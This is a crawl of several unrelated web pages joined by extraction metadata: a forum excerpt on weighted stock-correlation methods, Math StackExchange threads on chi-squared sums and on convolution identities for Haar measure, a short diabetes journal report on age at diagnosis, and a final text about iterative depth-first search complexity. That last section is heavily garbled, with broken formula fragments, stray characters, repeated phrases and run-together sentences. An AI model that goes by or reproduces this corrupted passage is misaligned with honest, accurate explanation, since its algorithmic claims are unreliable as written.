To gauge the practical importance of the biases in methods 2 and 3, we calculate the weighted stock correlation for the stocks in the S&P 500 index during the period January 2002 through March 2004. For each month in our sample, we use the daily total returns of each of the S&P 500 constituents to calculate the pair-wise correlations needed in method 1, and the single stock volatilities needed in methods 2 and 3. In addition, we calculate the volatility of the S&P 500 index based on its daily total returns during the month, and we use the start-of-month index weights to obtain the weighted average stock correlation.
Exhibit 2A shows the resulting weighted average cross-stock correlations for each of the 27 months in the sample based on each of the three calculation methods. The choice of method has a modest impact on the average correlation number for a well-diversified portfolio or index such as the S&P 500. Exhibit 2B makes this point even clearer by plotting the differences between the correlations numbers obtained from each of the methods. The absolute difference in correlation fell below 0.05 during the past 2+ years. Exhibit 2B also visualizes the consistent upward bias in method 3 as compared to method 2, but the overestimation is less than 0.01 in absolute value.
Exhibits 3A and 3B analyze the difference between methods 1 and 2 further, by looking at some crude measures associated with the volatility bias in method 2 identified above. They suggest that larger differences tend to happen more often in periods when average stock volatility is higher or when stock volatility has changed by a larger amount.
• Thank you, do you have a source? If this is the original paper do you have a link? – vonjd Apr 13 '17 at 6:01
• This is from that GS paper, but it's not available publicly. With your answer and this addition, that pretty much covers everything that's in that report. – msitt Apr 13 '17 at 6:04
• Ok, I found it in the GS database, thank you again. – vonjd Apr 13 '17 at 6:12
• Do you think the formula for $\rho_{avg(3)}$ is right? it looks more like a $\rho^2$ (always positive) than a $\rho$. What does the original paper say? – noob2 Apr 13 '17 at 11:24
• @noob2: Just checked it, the formula is the same. – vonjd Apr 13 '17 at 13:00 | 2019-10-16 14:07:03 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6481563448905945, "perplexity": 803.5987420965067}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-43/segments/1570986668994.39/warc/CC-MAIN-20191016135759-20191016163259-00138.warc.gz"} |
https://math.stackexchange.com/questions/1096298/question-about-sum-of-chi-squared-distribution | # Question about sum of chi-squared distribution
I want to prove that the sum of two independent chi-squared random variables is a chi-squared random variable.
I am supposed to only use the fact that if $Q$ has a chi-squared distribution with parameter k then Q = $Z_1^2$ + $Z_2^2$ + ... + $Z_k^2$ where each $Z_i$ is a standard normally distributed random variable and {$Z_1$,...,$Z_k$} is independent.
My attempt at a proof:
Let $Q_1$ and $Q_2$ be independent random variables with chi-squared distributions, with parameters a and b, respectively. Let {$X_1$,...,$X_a$,$Y_1$,...,$Y_b$} be a set of independent random variables with standard normal distributions. Then we can write
$Q_1$ = $X_1^2$ + $X_2^2$ + ... + $X_a^2$
$Q_2$ = $Y_1^2$ + $Y_2^2$ + ... + $Y_b^2$ , and $Q_1$ and $Q_2$ are independent because {$X_1$,...,$X_a$,$Y_1$,...,$Y_b$} is independent.
so $Q_2$ + $Q_2$ = $X_1^2$ + $X_2^2$ + ... + $X_a^2$ + $Y_1^2$ + $Y_2^2$ + ... + $Y_b^2$.
Since {$X_1$,...,$X_a$,$Y_1$,...,$Y_b$} is independent, $Q_2$ + $Q_2$ is a chi-squared random variable with parameter a+b.
I don't think my proof is correct. I think the problem is that if we are given $Q_1$ and $Q_2$ that are independent, we can't just write them in terms of {$X_1$,...,$X_a$,$Y_1$,...,$Y_b$}. But I am not really sure. Please tell me why my proof is incorrect (or maybe it is correct). Any help is appreciated.
• In my view your proof is correct (and nice too). If you are still suspicious then you could use the characteristic functions of the distributions. – drhab Jan 8 '15 at 11:16
• "We can't just write them in terms of..." Yes, we can! And in many cases we should, since this practice is very fruitful. Just as a binomial can be written as finite sum of Bernouillis. Very handsome e.g. if expectations must be calculated. – drhab Jan 8 '15 at 11:39
• I guess what I am a bit confused about is: we know that Q1 can be written as a sum of the squares of independent standard normal variables {A1,A2,...,Am} and Q2 can be written as a sum of the squares of independent standard normal variables {B1,B2,...,Bn} (I am not confused about this), but how can we be sure that {A1,...,Am,B1,...,Bn} is independent? – Noppawee Apichonpongpan Jan 8 '15 at 11:47
• See my answer with an accent on start. We are sure of the independence of the $A_i$ and $B_j$ because we preassume them to be independent. – drhab Jan 8 '15 at 12:49
You can just start with independent standard normal variables $\{A_1,\dots,A_m,B_1,\dots,B_n\}$ and define: $$Q_1=A_1^2+\cdots+A_m^2$$ $$Q_2=B_1^2+\cdots+B_n^2$$ $$Q=A_1^2+\cdots+A_m^2+B_1^2+\cdots+B_n^2$$ Then $Q_1$ and $Q_2$ are independent and both have chi-squared distribution with parameters $m$ and $n$ respectively.
Also it is clear that $Q_1+Q_2=Q$ and that $Q$ has chi-squared distribution with parameter $m+n$.
Proved is now that a sum of two independent rv's with chi-squared distribution also has chi-squared distribution. Its parameter is the sum of the parameters of its terms.
What follows can be left out and must be seen as an effort to make your understanding complete:
If $Q_1'$ and $Q_2'$ are independent chi-squared distributions with parameters $m$ and $n$ respectively that 'show up somewhere' then:
• $Q_1'$ and $Q_1$ have the same distribution.
• $Q_2'$ and $Q_2$ have the same distribution.
• $Q':=Q_1'+Q_2'$ and $Q=Q_1+Q_2$ have the same distribution.
• I think this is correct. Thank you very much for explaining it to me so clearly! – Noppawee Apichonpongpan Jan 8 '15 at 13:18
• You are very welcome. – drhab Jan 8 '15 at 14:10 | 2018-12-12 04:42:50 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8061971664428711, "perplexity": 134.61144821263795}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-51/segments/1544376823738.9/warc/CC-MAIN-20181212044022-20181212065522-00387.warc.gz"} |
https://math.stackexchange.com/questions/389061/verifying-convolution-identities | # Verifying Convolution Identities
Note: I don't yet have a solution to my main issue yet which I have elaborated on in the edit. Further attention is deeply appreciated. :>
$\bf{\text{Original Question}}$:
Let $G$ be a locally compact group, $\mu$ a Haar measure for $G$ and $f,g\in L^{1}(G)$.
Then by definition $(f*g)(x) = \int_{G}f(y)g(y^{-1}x)\mu(dy)$.
The author remarks in the book I am reading that we also have the following identities:
\begin{eqnarray*} (f*g)(x) &=& \int_{G}f(xy)g(y^{-1})\mu(dy)\\ &=& \int_{G}\delta(y^{-1})f(y^{-1})g(yx)\mu(dy)\\ &=& \int_{G}\delta(y^{-1})f(xy)g(y)\mu(dy) \end{eqnarray*}
where $\delta:G\to(0,\infty)$ is the unique modular function such that $\delta(x)\mu(B) = \mu(Bx)$ for all Borel sets $B$ and $x\in G$.
I cannot seem to get verify any of them. Can anyone help me get started on this? The smallest suggestion possible is best.
I was trying to use the property that $\int_{G}f(xy)\mu(dy) = \int_{G}f(y)\mu(x\cdot dy)$ but I couldn't get anywhere. Any suggestions on what the correct trick is?
$\bf{\text{Edit }}\text{(Far more basic question)}:$
I get very confused with some of the measure theory notation, so I've been trying to neurotically stick to one convention so as not to be confused.
For a $\mu$-integrable $f$, I've been writing $$\int_{G}fd\mu = \int_{G}f(x)\mu(dx)$$ to mean that $x$ is my variable of integration.
Then based on this convention, if we define $\lambda(E) = \mu(yE)$, then I've been writing
$$\int_{G}fd\lambda = \int_{G}f(x)\lambda(dx) = \int_{G}f(x)\mu(y\cdot dx)$$
It this the quantity you are referring to when you write $\int_{G}f(x)d(yx)$?
If so, am I correct to perform the following calculation (returning to the case where $\mu$ is a Haar measure)?
$\begin{eqnarray*} \int_{G}fd\mu &=& \int_{G}f(x)\mu(dx)\\ &=& \int_{G}f(x)\mu(y\cdot dx)\\ &=& \int_{G}f(y^{-1}yx)\mu(y\cdot dx)\\ &=& \int_{G}f(y^{-1}x)\mu(dx)\\ &=& \int_{G}f(y^{-1}\cdot)d\mu \end{eqnarray*}$
Please be mercilessly honest if anything is even slightly incorrect. I've had a "vague" understanding of these technicalities for far too long and I want to finally really nail them down.
To get all of these properties, use the defining property of the Haar measure: It is left-invariant under the action of $G$. In other words, $\int f(x)dx=\int f(x) d(yx)$ for any $y\in G$. Once you have this, you can change the measure in that fashion without affecting the value of the integral, and then change variables to get your old measure back: for instance, in my previous example, replace $x$ with $y^{-1}x,$ so you get $\int f(x) d(yx)=\int f(y^{-1}x) d(yy^{-1}x)=\int f(y^{-1}x)dx.$ [By the way, I'm suppressing the $\mu$ in my notation to make things look cleaner.]
Thus, we can get the first equality you ask about by replacing $y$ with $xy,$ so we get \begin{align*}(f * g)(x)&=\int_G f(y)g(y^{-1}x)dy\\&=\int_Gf(xy)g((xy)^{-1}x)d(xy)\\&=\int_Gf(xy)g(y^{-1})d(xy)\\&=\int_G f(xy) g(y^{-1})dy,\end{align*} where the final equality comes from the left-invariance of Haar measure. | 2019-06-25 19:59:54 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9415780901908875, "perplexity": 104.267798295658}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627999946.25/warc/CC-MAIN-20190625192953-20190625214953-00132.warc.gz"} |
https://diabetesjournals.org/care/article/30/11/2859/4823/Does-Age-at-Diabetes-Diagnosis-Influence-Long-Term | Type 1 diabetes is a complex chronic illness. Because self-care is such an essential element of successful diabetes management, cognitive and behavioral aspects of childhood development may interfere with effective self-care behaviors and impact the probability of later complications. The objective of this study was to examine whether the age at diagnosis of diabetes is significantly related to physical and behavioral outcomes in adulthood. It may be that children diagnosed in adolescence spend their first few years with diabetes rebelling against the therapeutic demands of treatment. An intense phase of inadequate care could lead to health consequences later in life; behaviors adopted in adolescence could also linger long into adulthood. Conversely, it is possible that being diagnosed very early in life leads to a dependence on others that affects health and behavior long into the future.
This study used the patient survey data collected as part of the Translating Research into Action for Diabetes (TRIAD) study, which has been previously described (1). All patients with diabetes who participated in the TRIAD study, had baseline patient survey and chart review data for the period between July 2000 and October 2001, and reported being diagnosed with diabetes at or before 21 years of age were selected for inclusion in this study. The CASRO response rate was 69% (2).
We extracted information about health and social outcomes. Health outcomes included reported weight, BMI, prevalences of heart attack and stroke, and self-reported general health. We also assessed physical health status using a 12-item short form with physical component subscores (3). Social outcomes included levels of income and education and smoking behavior. Demographic data were gathered for each patient, including age at time of interview, number of years since diagnosis, race, and sex. The main predictor was self-reported age at diagnosis of diabetes.
To adjust for potential confounding factors in analyses of continuous outcome variables, we used multiple regressions. Covariates included in all of the models were sex, race/ethnicity, and duration of diabetes. Even though age is a continuous variable, we divided age at diabetes onset into three categories (0–9, 10–13, and 14–21 years) in order to more adequately reflect our hypothesis and to be consistent with prior studies that performed similar analyses (46). For linear regression models, we estimated the β-coefficient (slope) and its 95% CI for the age at diabetes onset. For logistic regression models, we estimated the odds ratio (OR) and its 95% CI for the age at diabetes onset. Statistical significance was defined at 0.05 (two sided).
A total of 590 participants met inclusion criteria for this study. Over one-half of participants were female (59.8%), and 43.4% were nonwhite. Almost one-half (48.6%) were diagnosed with diabetes at 14–21 years of age, with the remainder diagnosed between 0–9 years of age (29.5%) and 10–13 years of age (21.9%). Mean current age at the time of the TRIAD study did not differ significantly across the three diabetes age-at-onset categories. Because of this, mean duration of diabetes was the longest for individuals diagnosed between 0 and 9 years of age (duration 32.7 years) and the shortest for those diagnosed between 14 and 21 years of age (duration 24.6 years). There were no differences in reported treatment by patient and age at diagnosis group.
### Adjusted associations between age at onset and later health outcomes
After adjusting for personal characteristics and duration of disease, individuals diagnosed between 14 and 21 years of age were significantly heavier (BMI 1.99 kg/m2 [95% CI 0.46–3.52]) than those diagnosed between 10 and 13 years of age. Those diagnosed between 0 and 9 years of age were significantly less likely to have had a heart attack (OR 0.48 [95% CI 0.23–0.97]) than those diagnosed between 10 and 13 years of age. In adjusted models, there were no statistically significant associations between age at onset and stroke or quality of life. Interestingly, patients diagnosed between 14 and 21 years of age were significantly less likely to have smoked in the last year (0.45 [0.27–0.74]) than those diagnosed between 10 and 13 years of age (Table 1). Those diagnosed between 0 and 9 years of age may have had this same relationship, but it was not statistically significant (0.73 [0.42–1.25]). Although the relationships between the age at diagnosis and other social outcomes (i.e., household income and education attainment) trended toward the results seen in the unadjusted data, none were statistically significant.
Our analyses show that the timing of childhood diabetes diagnosis is significantly associated with important health-related factors later in life. After adjusting for duration of disease, children diagnosed between 10 and 13 years of age were significantly more likely to have had a heart attack than those diagnosed between 0 and 9 years of age. We also found that children diagnosed between 10 and 13 years of age were more likely to have adopted a risky behavior (e.g., smoking that continues in adulthood) than those diagnosed between 14 and 21 years of age.
There are several limitations to this study. Our sample size was relatively small and may have lacked statistical power to detect meaningful differences in some of the main outcome variables. Our study was also cross-sectional and included analyses of several outcomes that depended on recall of events. In addition, although participants across the three study groups were diagnosed with diabetes as either children or adolescents, an average of ∼30 years ago, it is possible that some had type 2 diabetes. This seems unlikely, however, given that a diagnosis of type 2 diabetes was extremely rare during the era in which the diagnosis was made. We made every effort to identify those who might have type 2 diabetes and conducted sensitivity analyses. Our analysis was also limited by the fact that it is impossible to control for both diabetes duration and current age in a regression setting, due to the dependencies among age at onset, diabetes duration, and current age.
Diabetes is a difficult disease to manage under ideal conditions. The unique demands of adolescent development, particularly the separation from parental norms and the development of a self-identity, clearly can impact the demands of diabetes treatment. Our data suggest that age at diagnosis may be an important factor in long-term outcomes associated with the disease.
Table 1—
Adjusted associations between age at diagnosis and current social and behavioral outcomes*
Age at onset*
0–9 years old14–21 years old
Education (high school or more) 0.91 (0.44–1.89) 0.86 (0.42–1.74)
Annual income over $40k 0.83 (0.50–1.38) 1.02 (0.64–1.64) Smoked cigarettes in last year 0.73 (0.42–1.25) 0.45 (0.27–0.74) Age at onset* 0–9 years old14–21 years old Education (high school or more) 0.91 (0.44–1.89) 0.86 (0.42–1.74) Annual income over$40k 0.83 (0.50–1.38) 1.02 (0.64–1.64)
Smoked cigarettes in last year 0.73 (0.42–1.25) 0.45 (0.27–0.74)
Data are OR (95% CI).
*
All results are comparisons with adolescent age at onset (10–13 years old). Adjusted ORs include 95% CI, as determined using logistic regression models. All models adjusted for sex, race, and duration of diabetes in years.
This research was funded by grants from the National Institutes of Health (1 K23 DK067879-01 to A.E.C.) and by Program Announcement no. 04005 from the Centers for Disease Control and Prevention (Division of Diabetes Translation) and the National Institute of Diabetes and Digestive and Kidney Diseases as part of the TRIAD study.
1.
The Translating Research Into Action for Diabetes (TRIAD) study: a multicenter study of diabetes in managed care.
Diabetes Care
25
:
386
–389,
2002
2.
Frankel L: The report of the CASRO Task Force on response rates. In
Improving Data Quality In a Sample Survey
. Wiseman R, Ed. Cambridge, MA, Marketing Science Institute, 1983, p. 1–11
3.
Ware J Jr, Kosinski M, Keller SD: A 12-item short-form health survey: construction of scales and preliminary tests of reliability and validity.
Med Care
34
:
220
–233,
1996
4.
Kaufman FR, Epport K, Engilman R, Halvorson M: Neurocognitive functioning in children diagnosed with diabetes before age 10 years.
J Diabetes Complications
13
:
31
–38,
1999
5.
Krolewski AS, Warram JH, Rand LI, Christlieb AR, Busick EJ, Kahn CR: Risk of proliferative diabetic retinopathy in juvenile-onset type 1 diabetes: a 40-yr follow-up study.
Diabetes Care
9
:
443
–452,
1986
6.
Ryan CM, Morrow LA: Self-esteem in diabetic adolescents: relationship between age at onset and gender.
J Consult Clin Psychol
54
:
730
–731,
1986
Published ahead of print at http://care.diabetesjournals.org on 6 August 2007. DOI: 10.2337/dc07-0563.
A table elsewhere in this issue shows conventional and Système International (SI) units and conversion factors for many substances.
The costs of publication of this article were defrayed in part by the payment of page charges. This article must therefore be hereby marked “advertisement” in accordance with 18 U.S.C Section 1734 solely to indicate this fact. | 2022-05-27 03:13:55 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5194287896156311, "perplexity": 3337.162238393646}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662631064.64/warc/CC-MAIN-20220527015812-20220527045812-00486.warc.gz"} |
https://polskanawozku.pl/jo-l-veefdd/iterative-dfs-space-complexity-14bc78 | ### iterative dfs space complexity
DFS vs BFS. Iterative DFS Approach. {\displaystyle b} 1 ⟨ Please note that O(m) may vary between O(1) and O(n 2), depending on how dense the graph is. Because early iterations use small values for d Tarjan's SCC : example showing necessity of lowlink definition and calculation rule? t d I'm referring to a question already asked on stackoverflow: https://stackoverflow.com/questions/25988965/does-depth-first-search-create-redundancy. s Iterative deepening depth-first search is a hybrid algorithm emerging out of BFS and DFS. 3 What is the term for diagonal bars which are making rectangular frame more rigid? How do they determine dynamic pressure has hit a max? {\displaystyle O(d)} Then, following your idea, 4 won't be pushed again in 1 -- no DFS. t a − This means all paths are part of the answer. . + {\displaystyle d} , Watch Queue Queue Watch Queue Queue Remove all … Complexity Analysis of Depth First Search Time Complexity The time complexity of DFS if the entire tree is traversed is O(V) where V is the number of nodes. {\displaystyle b^{d}(1+2x+3x^{2}+\cdots +(d-1)x^{d-2}+dx^{d-1}+(d+1)x^{d})\leq b^{d}(1-x)^{-2}} If you make a magic weapon your pact weapon, can you still summon other weapons? 1 IDDFS is optimal like breadth-first search, but uses much less memory; at each iteration, it visits the nodes in the search treein the same order as depth-first search, but the cumulative order in which nodes are first visited is effectively breadt… Apple Silicon: port all Homebrew packages under /usr/local/opt/ to /opt/homebrew. {\displaystyle v} BFS: Time complexity is [code ]O(|V|)[/code] where [code ]|V|[/code] is the number of nodes,you need to traverse all nodes. d If we consider this. , they execute extremely quickly. expands only about For this graph, as more depth is added, the two cycles "ABFE" and "AEFB" will simply get longer before the algorithm gives up and tries another branch. Since an extra visited array is needed of size V. Modification of the above Solution: Note that the above implementation prints only vertices that are reachable from a given vertex. Node 2's children are node 0 and node 3. The algorithm starts at an arbitrary node and explores as far as Also, all the visited nodes so far are marked with a red color. DFS Completeness ? And if this decision leads to win situation, we stop. In computer science, iterative deepening search or more specifically iterative deepening depth-first search[2] (IDS or IDDFS) is a state space/graph search strategy in which a depth-limited version of depth-first search is run repeatedly with increasing depth limits until the goal is found. Otherwise, the forward search process expands the child nodes of the source node (set Time complexity? Also it sees E via a different path, and loops back to F twice.). In DFS, we need to store only the nodes which are present in the path from the root to the current node and their unexplored successors. , and the backward search will proceed from d The space complexity would thus be $Θ(|E|)$ in the worst case. Why is DFS considered to have $O(bm)$ space complexity? The O(bd) cost is derived from an implementation that uses a queue to store unexplored nodes, rather than recursion. is the depth of the goal. d d ( What if I made receipt for cheque on client's demand and client asks me to return the cheque and pays in cash? Time complexity: O(b^d), where b is the branching factor and d is the depth of the goal. This assumes that the graph is represented as an adjacency list. This implementation of IDDFS does not account for already-visited nodes and therefore does not work for undirected graphs. more nodes than a single breadth-first or depth-limited search to depth b − Otherwise, the search depth is incremented and the same computation takes place. 11 ) {\displaystyle u} intersect. − Time complexity is expressed as: It is similar to the DFS i.e. d (the depth), if 10 x Use MathJax to format equations. We run Depth limited search (DLS) for an increasing depth. d x This means that given a tree data structure, the algorithm will return the first node in this tree that matches the specified condition. The search process first checks that the source node and the target node are same, and if so, returns the trivial path consisting of a single source/target node. When the depth will reach two hops along the arcs, the forward search will proceed to u Linear space complexity, O(bd), like DFS; Depth First Iterative Deepening combines the advantage of BFS (i.e., completeness) with the advantages of DFS (i.e., limited space and finds longer paths more quickly) This algorithm is generally preferred for large state spaces where the solution depth is unknown. The Time complexity of BFS is O(V + E) when Adjacency List is used and O(V^2) when Adjacency Matrix is used, where V stands for vertices and E stands for edges. 1 ) , and hence the maximum amount of space is Iterative deepening A* is a best-first search that performs iterative deepening based on "f"-values similar to the ones computed in the A* algorithm. {\displaystyle d+1} ITERATIVE DEEPENING Iterative deepening is a very simple, very good, but counter-intuitive idea that was not discovered until the mid 1970s. − However I'm not quite convinced by the answers provided there. The running time of bidirectional IDDFS is given by, where increases. , if there is no arc leaving ,[1]:5 where When you ask on Stack Overflow, you'll usually get practice-driven trade-offs: use what's faster in your setting. [4], The main advantage of IDDFS in game tree searching is that the earlier searches tend to improve the commonly used heuristics, such as the killer heuristic and alpha–beta pruning, so that a more accurate estimate of the score of various nodes at the final depth search can occur, and the search completes more quickly since it is done in a better order. site design / logo © 2021 Stack Exchange Inc; user contributions licensed under cc by-sa. 1 Want low space complexity but completeness and optimality Key Idea: re-compute elements of the frontier rather than saving them 15 Iterative Deepening DFS (IDS): Motivation Complete Optimal Time Space DFS N (Y ifN O) Since IDDFS, at any point, is engaged in a depth-first search, it need only store a stack of nodes which represents the branch of the tree it is expanding. < Name of BFS variant with multiple queues with different priorities, First-time and second-time seen edges in DFS on undirected graphs. 2 are expanded once, those at depth n By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy. It runs with time complexity of O(V+E), where V is the number of nodes, and E is the number of edges in a graph. O Iterative-Deepening Search (IDS) IDS merupakan metode yang menggabungkan kelebihan BFS (Complete dan Optimal) dengan kelebihan DFS (space complexity … Space of the Algorithm The space complexity of Iterative Deepening Depth-First Search (ID-DFS) is the same as regular Depth-First Search (DFS), which is, if we exclude the tree itself, O (d), with d being the depth, which is also the size of the call stack at maximum depth. Why was there a "point of no return" in the Chernobyl series that ended in the meltdown? For DFS , which goes along a single ‘branch’ all the way down and uses a stack implementation, the height of the tree matters. Also, learn what is dfs algorithm, its applications & complexity. Another solution could use sentinel values instead to represent not found or remaining level results. BFS vs. DFS: Space-time Tradeoff Skip navigation Sign in Search Loading... Close This video is unavailable. the number is, All together, an iterative deepening search from depth In the beginning, we add the node to the stack in the first step. This is the best place to expand your knowledge and get prepared for your next interview. 1 For example, alpha–beta pruning is most efficient if it searches the best moves first.[4]. Complexity Analysis: Time complexity: O(V + E), where V is the number of vertices and E is the number of edges in the graph. ( The problems that occur in the simple DFS can be solved by the other algorithms that can efficiently solve the same problem. Some iterative DFS implementations that I have seen (such as the one provided by Wikipedia) allow vertices to be pushed onto the stack more than once. ) No, fails in infinite depth spaces or spaces with loops Yes, assuming state space finite. is the depth of the goal. ≤ = If the goal node is found, then DLS unwinds the recursion returning with no further iterations. This will continue until the stack is filled with 100 occurrences of node 0. why would one want to allow multiple occurrences of a same vertex in the stack. 1 + What is fringe node? , and so on. is the branching factor and 1 − It expands nodes in the order of increasing path cost; therefore the first goal it encounters is the one with the cheapest path cost. T {\displaystyle n} {\displaystyle 11\%} Here is one idea. ) {\displaystyle O(d)} (While a recursive implementation of DFS would only require at most $Θ(|V|)$ space.). or What's the difference between 'war' and 'wars'? What are the key ideas behind a good bassline? 5 Space complexity of an algorithm is the amount of memory required by an algorithm to complete its task. O The Depth First Search(DFS) is the most fundamental search algorithm used to explore the nodes and edges of a graph. A second advantage is the responsiveness of the algorithm. (While a s ) Then node 2 will be pushed. For general remarks, I can only guess here since I can't read the minds of others. ) DFS is more suitable for game or puzzle problems. times. . The space complexity would thus be $Θ(|E|)$ in the worst case. ,[1]:5 where % b The iterative deepening depth-first search is a state space search algorithm, which combines the goodness of BFS and DFS. 2 = {\displaystyle d} In an iterative deepening search, the nodes at depth d Consider the first three steps in case of the iterative DFS: In the iterative DFS, we use a manual stack to simulate the recursion. The edges have to be unweighted. [3], Since iterative deepening visits states multiple times, it may seem wasteful, but it turns out to be not so costly, since in a tree most of the nodes are in the bottom level, so it does not matter much if the upper levels are visited multiple times. And if this decision leads to win situation, we stop. ) Space Complexity of iterative code = O(1) Critical ideas to think! {\displaystyle b>1} When search is performed to a limited depth, the time is still linear in terms of the number of expanded vertices and edges (although this number is not the same as the size of the entire graph because some vertices may be searched more than once and others not at all) but the space complexity of this variant of DFS is only proportional to the depth limit, and as a result, is much smaller than the space needed for … Saying "usually", keep in mind that your arguments are worst-case considerations. Ask Faizan 4,328 views Pictorially, the search frontiers will go through each other, and instead a suboptimal path consisting of an even number of arcs will be returned. Worst Case for DFS will be the best case for BFS, and the Best Case for DFS will be the worst case for BFS. ( Depending on the graphs you're looking at, the actual behaviour may be very different. Solution could use sentinel values instead to represent not found or remaining level results if goal. Of iterative code = O ( d ), ( it still sees C but. Ended in the stack are never pushed onto the stack are never pushed the... Indications of the algorithm does this until the entire graph has been explored \displaystyle \langle s u! And second-time seen edges in DFS on undirected graphs w ) where h is the fundamental. Comparison of search algorithm used to explore the nodes from the stack and that position is set the. Algorithm - Duration: 9:27 where h is the depth of the result almost immediately, followed by as! See our tips on writing great answers the term for diagonal bars are. In this tree that matches the specified condition them up with references or personal experience nodes in proper order! The runtime complexity, as each node needs to store unexplored nodes, rather than.! Lt Handlebar Stem asks to tighten top Handlebar screws first before bottom screws add. Be the same problem ' and 'wars ' depth-first search is always optimal as it only a. What if I made receipt for cheque on client 's demand and client asks to... The edge to a question already asked on stackoverflow: https: //stackoverflow.com/questions/25988965/does-depth-first-search-create-redundancy supply early of. Ll cover in a later note ( IDA∗ ) 'war ' and 'wars ', the space complexity for is! – what we call linear space. ) privacy policy and cookie policy other that! To subscribe to this graph, with node 1 as the start state to the! Or personal experience state space search algorithm | Complexities of BFS and DFS © 2021 stack Inc... If we include the tree, this keeps the stack in the stack puzzle problems unexplored nodes rather. Number of arcs will not be detected general points about time and space..! D. can do well if lots of goals space complexity for BFS is O 1! But iterative lengthening incurs substantial overhead that makes it less useful than iterative deepening depth first search DFS! Dfs is more suitable for game or puzzle problems depth of the tree to a... Boundary instead of depth-limits E via a different path, and loops back to the caller functions the,... Unwinds the recursion returning with no further iterations bd ) cost is derived from an that!. [ 4 ] the answers provided there game or puzzle problems be! Where the above mentioned algorithm would not visit nodes in proper DFS order bd. Onto the stack again sure that vertices which enter and leave the stack again nodes rather. Dfs any more where b is the responsiveness of the goal DFS order from cell ( n-1, ). Stack are never pushed onto the stack, it will find a node to the caller functions to DFSe d.... U, V, t\rangle. \displaystyle \langle s, u, V, ⟩. Balanced tree, this keeps the stack again simple, very good, but counter-intuitive idea was. Why continue counting/certifying electors after one candidate has secured a majority limits of..., I iterative dfs space complexity only guess here since I ca n't think of a counterexample where above! Clarification, or responding to other answers, terrible if mis much bigger than d. can do well if of. Than iterative deepening is a state space search algorithm, which combines the of. Or puzzle problems, this would be ( log n ) space, where d is depth of search -. The old stack entry, then explore all paths through this decision by the answers provided.... Because all function calls must be stored in a stack to allow the return back to the stack and position. While a recursive implementation of DFS would only require at most $Θ ( |E| )$.... Graph, with node 1 as the runtime complexity, as each node needs to store all the in! Keep in mind that your arguments are worst-case considerations other weapons than d. can do well if lots of space...: 9:27 stack entry, then explore all paths are part of the goal node is found then. Function calls must be stored in a ( well-balanced ) tree works out to be half brothers in... Idea, 4 wo n't be pushed onto the stack concerned about memory consumption which! Computation takes place inside unencrypted MSSQL iterative dfs space complexity backup file ( *.bak ) without?... Bars which are making rectangular frame more rigid I 'm not quite convinced the! Specified depth limit 're looking at, the search depth is incremented and the computation... Your answer ”, you agree to our terms of a counterexample where the above algorithm! Selects a path with the iterative algorithms name of BFS DFS DLS IDS algo | Uninformed search algorithm Complexities! Page for IDDFS nodes so far are marked with a red color asked on stackoverflow: https 